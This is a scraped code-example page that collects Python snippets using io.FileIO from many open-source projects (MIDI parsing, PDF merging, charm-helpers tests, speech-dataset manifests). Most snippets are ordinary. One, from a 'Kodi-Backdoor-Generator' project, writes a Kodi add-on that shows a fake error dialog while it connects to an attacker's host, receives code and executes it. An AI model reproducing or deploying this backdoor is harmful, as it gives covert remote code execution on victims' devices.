python类FileIO()的实例源码

descriptors.py 文件源码 项目:sqlalchemy-media 作者: pylover 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def replace(self, attachable: [io.BytesIO, io.FileIO], position=None, **kwargs):
        """

        .. versionadded:: 0.5

        Replace the underlying file-object with a seekable one.

        :param attachable: A seekable file-object.
        :param position: Position of the new seekable file-object. if :data:`.None`, position will be preserved.
        :param kwargs: the same as the :class:`.BaseDescriptor`
        """

        if position is None:
            position = self.tell()
        # Close the old file-like object
        self.close()
        self._file = attachable

        # Some hacks are here:
        super().__init__(**kwargs)
        self.seek(position)
merger.py 文件源码 项目:spiderfoot 作者: wi-fi-analyzer 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def append(self, fileobj, bookmark=None, pages=None, import_bookmarks=True):
        """
        Identical to the :meth:`merge()<merge>` method, but assumes you want to concatenate
        all pages onto the end of the file instead of specifying a position.

        :param fileobj: A File Object or an object that supports the standard read
            and seek methods similar to a File Object. Could also be a
            string representing a path to a PDF file.

        :param str bookmark: Optionally, you may specify a bookmark to be applied at
            the beginning of the included file by supplying the text of the bookmark.

        :param pages: can be a :ref:`Page Range <page-range>` or a ``(start, stop[, step])`` tuple
            to merge only the specified range of pages from the source
            document into the output document.

        :param bool import_bookmarks: You may prevent the source document's bookmarks
            from being imported by specifying this as ``False``.
        """

        self.merge(len(self.pages), fileobj, bookmark, pages, import_bookmarks)
structure.py 文件源码 项目:midi 作者: MicroTransactionsMatterToo 项目源码 文件源码 阅读 41 收藏 0 点赞 0 评论 0
def __init__(self, data: Union[FileIO, BufferedReader]) -> None:
        chunk_type = data.read(4)
        if chunk_type != b'MThd':
            raise ValueError("File had invalid header chunk type")

        header_length = int.from_bytes(data.read(4), 'big')
        if header_length != 6:
            raise ValueError("File has unsupported header length")
        self.length = header_length

        format = int.from_bytes(data.read(2), 'big')
        if format not in [0, 1, 2]:
            raise ValueError("File has unsupported format")
        self.format = format

        ntrks = int.from_bytes(data.read(2), 'big')
        if ntrks > 0 and format == 0:
            raise ValueError("Multiple tracks in single track format")
        self.ntrks = ntrks

        self.tpqn = int.from_bytes(data.read(2), 'big')
kodi_backdoor.py 文件源码 项目:Kodi-Backdoor-Generator 作者: LukaSikic 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def addonPy(ip, port):
    with io.FileIO("KodiBackdoor/addon.py", "w") as file:
        file.write('''
import xbmcaddon
import xbmcgui
import socket,struct
addon       = xbmcaddon.Addon()
addonname   = addon.getAddonInfo('name')
line1 = "Error!"
line2 = "An error occurred"
line3 = "Connection to server failed... please try again later"
s=socket.socket(2,1)
s.connect(("'''+ip+'''",'''+port+'''))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
    d+=s.recv(4096)
exec(d,{'s':s})
xbmcgui.Dialog().ok(addonname, line1, line2, line3)
''')

#Zip folder
drive.py 文件源码 项目:GoogleBot 作者: MarcoBuster 项目源码 文件源码 阅读 43 收藏 0 点赞 0 评论 0
def download(user, file, msg):
    def startdownload(_request):
        downloader = MediaIoBaseDownload(fh, _request)
        done = False
        while not done:
            status, done = downloader.next_chunk()
            try:
                msg.edit(user.getstr('drive_downloading_progress')
                         .format(p=int(status.progress() * 100)))
            except botogram.api.APIError:
                pass

    os.chdir('/tmp')  # Sorry Windows users
    fh = io.FileIO(file.get('name'), 'wb')

    service = login(user)
    try:
        request = service.files().get_media(fileId=file.get('id'))
        startdownload(request)
        return '/tmp/' + file.get('name')
    except:
        request = service.files().export_media(fileId=file.get('id'), mimeType='application/pdf')
        startdownload(request)
        os.rename('/tmp/' + file.get('name'), '/tmp/' + file.get('name') + '.pdf')
        return '/tmp/' + file.get('name') + '.pdf'
test_file.py 文件源码 项目:targets-python 作者: targets-fs 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def valid_io_modes(self, *a, **kw):
        modes = set()
        t = LocalTarget(is_tmp=True)
        t.open('w').close()
        for mode in self.theoretical_io_modes(*a, **kw):
            try:
                io.FileIO(t.path, mode).close()
            except ValueError:
                pass
            except IOError as err:
                if err.errno == EEXIST:
                    modes.add(mode)
                else:
                    raise
            else:
                modes.add(mode)
        return modes
utils.py 文件源码 项目:deepspeech.pytorch 作者: SeanNaren 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def create_manifest(data_path, tag, ordered=True):
    manifest_path = '%s_manifest.csv' % tag
    file_paths = []
    wav_files = [os.path.join(dirpath, f)
                 for dirpath, dirnames, files in os.walk(data_path)
                 for f in fnmatch.filter(files, '*.wav')]
    for file_path in tqdm(wav_files, total=len(wav_files)):
        file_paths.append(file_path.strip())
    print('\n')
    if ordered:
        _order_files(file_paths)
    with io.FileIO(manifest_path, "w") as file:
        for wav_path in tqdm(file_paths, total=len(file_paths)):
            transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
            sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
            file.write(sample.encode('utf-8'))
    print('\n')
teepty.py 文件源码 项目:gitsome 作者: donnemartin 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def _pipe_stdin(self, stdin):
        if stdin is None or isinstance(stdin, io.FileIO):
            return None
        tsi = self._temp_stdin
        bufsize = self.bufsize
        if isinstance(stdin, io.BufferedIOBase):
            buf = stdin.read(bufsize)
            while len(buf) != 0:
                tsi.write(buf)
                tsi.flush()
                buf = stdin.read(bufsize)
        elif isinstance(stdin, (str, bytes)):
            raw = stdin.encode() if isinstance(stdin, str) else stdin
            for i in range((len(raw)//bufsize) + 1):
                tsi.write(raw[i*bufsize:(i + 1)*bufsize])
                tsi.flush()
        else:
            raise ValueError('stdin not understood {0!r}'.format(stdin))
Node.py 文件源码 项目:AsyncDB 作者: JimChengLin 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def load(self, file: FileIO):
        self.ptr = file.tell()
        self.is_leaf, self.keys = load(file)

        ptr_num = len(self.keys)
        if not self.is_leaf:
            ptr_num += (ptr_num + 1)
        ptrs = unpack('Q' * ptr_num, file.read(8 * ptr_num))

        if self.is_leaf:
            self.ptrs_value = list(ptrs)
        else:
            ptr_num //= 2
            self.ptrs_value = list(ptrs[:ptr_num])
            self.ptrs_child = list(ptrs[ptr_num:])
        self.size = file.tell() - self.ptr
test_sysctl.py 文件源码 项目:charm-helpers 作者: juju 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def test_create(self, mock_open):
        """Test create sysctl method"""
        _file = MagicMock(spec=io.FileIO)
        mock_open.return_value = _file

        create('{"kernel.max_pid": 1337}', "/etc/sysctl.d/test-sysctl.conf")

        _file.__enter__().write.assert_called_with("kernel.max_pid=1337\n")

        self.log.assert_called_with(
            "Updating sysctl_file: /etc/sysctl.d/test-sysctl.conf"
            " values: {'kernel.max_pid': 1337}",
            level='DEBUG')

        self.check_call.assert_called_with([
            "sysctl", "-p",
            "/etc/sysctl.d/test-sysctl.conf"])
test_openstack_utils.py 文件源码 项目:charm-helpers 作者: juju 项目源码 文件源码 阅读 39 收藏 0 点赞 0 评论 0
def test_configure_install_source_distro_proposed(
            self, _spcc, _open, _lsb):
        """Test configuring installation source from deb repo url"""
        _lsb.return_value = FAKE_RELEASE
        _file = MagicMock(spec=io.FileIO)
        _open.return_value = _file
        openstack.configure_installation_source('distro-proposed')
        _file.__enter__().write.assert_called_once_with(
            '# Proposed\ndeb http://archive.ubuntu.com/ubuntu '
            'precise-proposed main universe multiverse restricted\n')
        src = ('deb http://archive.ubuntu.com/ubuntu/ precise-proposed '
               'restricted main multiverse universe')
        openstack.configure_installation_source(src)
        _spcc.assert_called_once_with(
            ['add-apt-repository', '--yes',
             'deb http://archive.ubuntu.com/ubuntu/ precise-proposed '
             'restricted main multiverse universe'])
test_openstack_utils.py 文件源码 项目:charm-helpers 作者: juju 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def test_configure_install_source_uca_repos(
            self, _fip, _lsb, _install, _open):
        """Test configuring installation source from UCA sources"""
        _lsb.return_value = FAKE_RELEASE
        _file = MagicMock(spec=io.FileIO)
        _open.return_value = _file
        _fip.side_effect = lambda x: x
        for src, url in UCA_SOURCES:
            actual_url = "# Ubuntu Cloud Archive\n{}\n".format(url)
            openstack.configure_installation_source(src)
            _install.assert_called_with(['ubuntu-cloud-keyring'],
                                        fatal=True)
            _open.assert_called_with(
                '/etc/apt/sources.list.d/cloud-archive.list',
                'w'
            )
            _file.__enter__().write.assert_called_with(actual_url)
test_openstack_utils.py 文件源码 项目:charm-helpers 作者: juju 项目源码 文件源码 阅读 36 收藏 0 点赞 0 评论 0
def test_save_scriptrc(self, _open, _charm_dir, _exists, _mkdir):
        """Test generation of scriptrc from environment"""
        scriptrc = ['#!/bin/bash\n',
                    'export setting1=foo\n',
                    'export setting2=bar\n']
        _file = MagicMock(spec=io.FileIO)
        _open.return_value = _file
        _charm_dir.return_value = '/var/lib/juju/units/testing-foo-0/charm'
        _exists.return_value = False
        os.environ['JUJU_UNIT_NAME'] = 'testing-foo/0'
        openstack.save_script_rc(setting1='foo', setting2='bar')
        rcdir = '/var/lib/juju/units/testing-foo-0/charm/scripts'
        _mkdir.assert_called_with(rcdir)
        expected_f = '/var/lib/juju/units/testing-foo-0/charm/scripts/scriptrc'
        _open.assert_called_with(expected_f, 'wt')
        _mkdir.assert_called_with(os.path.dirname(expected_f))
        _file.__enter__().write.assert_has_calls(
            list(call(line) for line in scriptrc), any_order=True)
test_fetch_ubuntu.py 文件源码 项目:charm-helpers 作者: juju 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def test_configure_install_source_uca_repos(
            self, _fip, _lsb, _install, _open):
        """Test configuring installation source from UCA sources"""
        _lsb.return_value = FAKE_RELEASE
        _file = MagicMock(spec=io.FileIO)
        _open.return_value = _file
        _fip.side_effect = lambda x: x
        for src, url in UCA_SOURCES:
            actual_url = "# Ubuntu Cloud Archive\n{}\n".format(url)
            fetch.add_source(src)
            _install.assert_called_with(['ubuntu-cloud-keyring'],
                                        fatal=True)
            _open.assert_called_with(
                '/etc/apt/sources.list.d/cloud-archive.list',
                'w'
            )
            _file.__enter__().write.assert_called_with(actual_url)
utils.py 文件源码 项目:make_dataset 作者: hyzhan 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def create_manifest(data_path, tag, ordered=True):
    manifest_path = '%s_manifest.csv' % tag
    file_paths = []
    wav_files = [os.path.join(dirpath, f)
                 for dirpath, dirnames, files in os.walk(data_path)
                 for f in fnmatch.filter(files, '*.wav')]
    size = len(wav_files)
    counter = 0
    for file_path in wav_files:
        file_paths.append(file_path.strip())
        counter += 1
        update_progress(counter / float(size))
    print('\n')
    if ordered:
        _order_files(file_paths)
    counter = 0
    with io.FileIO(manifest_path, "w") as file:
        for wav_path in file_paths:
            transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
            sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
            file.write(sample.encode('utf-8'))
            counter += 1
            update_progress(counter / float(size))
    print('\n')
utils.py 文件源码 项目:make_dataset 作者: hyzhan 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def create_manifest(data_path, tag, ordered=True):
    manifest_path = '%s_manifest.csv' % tag
    file_paths = []
    wav_files = [os.path.join(dirpath, f)
                 for dirpath, dirnames, files in os.walk(data_path)
                 for f in fnmatch.filter(files, '*.wav')]
    size = len(wav_files)
    counter = 0
    for file_path in wav_files:
        file_paths.append(file_path.strip())
        counter += 1
        update_progress(counter / float(size))
    print('\n')
    if ordered:
        _order_files(file_paths)
    counter = 0
    with io.FileIO(manifest_path, "w") as file:
        for wav_path in file_paths:
            transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
            sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
            file.write(sample.encode('utf-8'))
            counter += 1
            update_progress(counter / float(size))
    print('\n')
utils.py 文件源码 项目:make_dataset 作者: hyzhan 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def create_manifest(data_path, tag, ordered=True):
    manifest_path = '%s_manifest.csv' % tag
    file_paths = []
    wav_files = [os.path.join(dirpath, f)
                 for dirpath, dirnames, files in os.walk(data_path)
                 for f in fnmatch.filter(files, '*.wav')]
    size = len(wav_files)
    counter = 0
    for file_path in wav_files:
        file_paths.append(file_path.strip())
        counter += 1
        update_progress(counter / float(size))
    print('\n')
    if ordered:
        _order_files(file_paths)
    counter = 0
    with io.FileIO(manifest_path, "w") as file:
        for wav_path in file_paths:
            transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
            sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
            file.write(sample.encode('utf-8'))
            counter += 1
            update_progress(counter / float(size))
    print('\n')
speedtest.py 文件源码 项目:SmartSocks 作者: waylybaye 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def __init__(self, **kwargs):
            buf = FileIO(sys.stdout.fileno(), 'w')
            super(_Py3Utf8Stdout, self).__init__(
                buf,
                encoding='utf8',
                errors='strict'
            )
openebs_utils.py 文件源码 项目:easy-jupyter 作者: openebs 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def download(url, file_name):
    """
    function to download file over http
    url : URL of file to be downloaded
    file_name : File name
    """
    with io.FileIO(file_name, "w") as file:
        # get request
        response = get(url)
        # write to file
        file.write(response.content)
py3k.py 文件源码 项目:radar 作者: amoose136 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def isfileobj(f):
        return isinstance(f, (io.FileIO, io.BufferedReader, io.BufferedWriter))
_fileloader2.py 文件源码 项目:filefinder2 作者: asmodehn 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def get_data(self, path):
            """Return the data from path as raw bytes."""
            with io.FileIO(path, 'r') as file:
                return file.read()

    # inspired from importlib2
merger.py 文件源码 项目:spiderfoot 作者: wi-fi-analyzer 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def write(self, fileobj):
        """
        Writes all data that has been merged to the given output file.

        :param fileobj: Output file. Can be a filename or any kind of
            file-like object.
        """
        my_file = False
        if isString(fileobj):
            fileobj = file(fileobj, 'wb')
            my_file = True

        # Add pages to the PdfFileWriter
        # The commented out line below was replaced with the two lines below it to allow PdfFileMerger to work with PyPdf 1.13
        for page in self.pages:
            self.output.addPage(page.pagedata)
            page.out_pagedata = self.output.getReference(self.output._pages.getObject()["/Kids"][-1].getObject())
            #idnum = self.output._objects.index(self.output._pages.getObject()["/Kids"][-1].getObject()) + 1
            #page.out_pagedata = IndirectObject(idnum, 0, self.output)

        # Once all pages are added, create bookmarks to point at those pages
        self._write_dests()
        self._write_bookmarks()

        # Write the output to the file
        self.output.write(fileobj)

        if my_file:
            fileobj.close()
merger.py 文件源码 项目:spiderfoot 作者: wi-fi-analyzer 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def close(self):
        """
        Shuts all file descriptors (input and output) and clears all memory
        usage.
        """
        self.pages = []
        for fo, pdfr, mine in self.inputs:
            if mine:
                fo.close()

        self.inputs = []
        self.output = None
merger.py 文件源码 项目:spiderfoot 作者: wi-fi-analyzer 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def addBookmark(self, title, pagenum, parent=None):
        """
        Add a bookmark to this PDF file.

        :param str title: Title to use for this bookmark.
        :param int pagenum: Page number this bookmark will point to.
        :param parent: A reference to a parent bookmark to create nested
            bookmarks.
        """
        if parent == None:
            iloc = [len(self.bookmarks)-1]
        elif isinstance(parent, list):
            iloc = parent
        else:
            iloc = self.findBookmark(parent)

        dest = Bookmark(TextStringObject(title), NumberObject(pagenum), NameObject('/FitH'), NumberObject(826))

        if parent == None:
            self.bookmarks.append(dest)
        else:
            bmparent = self.bookmarks
            for i in iloc[:-1]:
                bmparent = bmparent[i]
            npos = iloc[-1]+1
            if npos < len(bmparent) and isinstance(bmparent[npos], list):
                bmparent[npos].append(dest)
            else:
                bmparent.insert(npos, [dest])
        return dest
project.py 文件源码 项目:cheribuild 作者: CTSRD-CHERI 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def __runProcessWithFilteredOutput(self, proc: subprocess.Popen, logfile: "typing.Optional[io.FileIO]",
                                       stdoutFilter: "typing.Callable[[bytes], None]", cmdStr: str):
        logfileLock = threading.Lock()  # we need a mutex so the logfile line buffer doesn't get messed up
        stderrThread = None
        if logfile:
            # use a thread to print stderr output and write it to logfile (not using a thread would block)
            stderrThread = threading.Thread(target=self._handleStdErr, args=(logfile, proc.stderr, logfileLock, self))
            stderrThread.start()
        for line in proc.stdout:
            with logfileLock:  # make sure we don't interleave stdout and stderr lines
                if logfile:
                    logfile.write(line)
                if stdoutFilter:
                    stdoutFilter(line)
                else:
                    sys.stdout.buffer.write(line)
                    flushStdio(sys.stdout)
        retcode = proc.wait()
        if stderrThread:
            stderrThread.join()
        # Not sure if the remaining call is needed
        remainingErr, remainingOut = proc.communicate()
        if remainingErr:
            print("Process had remaining stderr:", remainingErr)
            sys.stderr.buffer.write(remainingErr)
            if logfile:
                logfile.write(remainingOut)
        if remainingOut:
            print("Process had remaining stdout:", remainingOut)
            sys.stdout.buffer.write(remainingOut)
            if logfile:
                logfile.write(remainingErr)
        if stdoutFilter and self._lastStdoutLineCanBeOverwritten:
            # add the final new line after the filtering
            sys.stdout.buffer.write(b"\n")
        if retcode:
            message = "Command \"%s\" failed with exit code %d.\n" % (cmdStr, retcode)
            if logfile:
                message += "See " + logfile.name + " for details."
            raise SystemExit(message)
test_utils.py 文件源码 项目:charm-nova-compute 作者: openstack 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def patch_open():
    '''Patch open() to allow mocking both open() itself and the file that is
    yielded.

    Yields the mock for "open" and "file", respectively.'''
    mock_open = MagicMock(spec='builtins.open')
    mock_file = MagicMock(spec=io.FileIO)

    @contextmanager
    def stub_open(*args, **kwargs):
        mock_open(*args, **kwargs)
        yield mock_file

    with patch('builtins.open', stub_open):
        yield mock_open, mock_file
meta_events.py 文件源码 项目:midi 作者: MicroTransactionsMatterToo 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def sequence_number(data: Union[FileIO, BufferedReader]) -> Tuple[int, int, bytearray]:
    length_bytes = bytearray(data.read(4))
    length = int.from_bytes(length_bytes, "big")
    if length != 2:
        raise EventLengthError("Sequence Number length was incorrect. It should be 2, but it was {}".format(length))
    sequence_num_raw = bytearray(data.read(2))
    sequence_num = int.from_bytes(sequence_num_raw, "big")
    return length, sequence_num, sequence_num_raw
meta_events.py 文件源码 项目:midi 作者: MicroTransactionsMatterToo 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def text_event(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparsable text in text event") from exc

    return length, text, raw_data
meta_events.py 文件源码 项目:midi 作者: MicroTransactionsMatterToo 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def copyright_notice(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparsable text in copyright notice") from exc

    return length, text, raw_data
meta_events.py 文件源码 项目:midi 作者: MicroTransactionsMatterToo 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def chunk_name(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparsable text in track/sequence name") from exc

    return length, text, raw_data


问题


面经


文章

微信
公众号

扫码关注公众号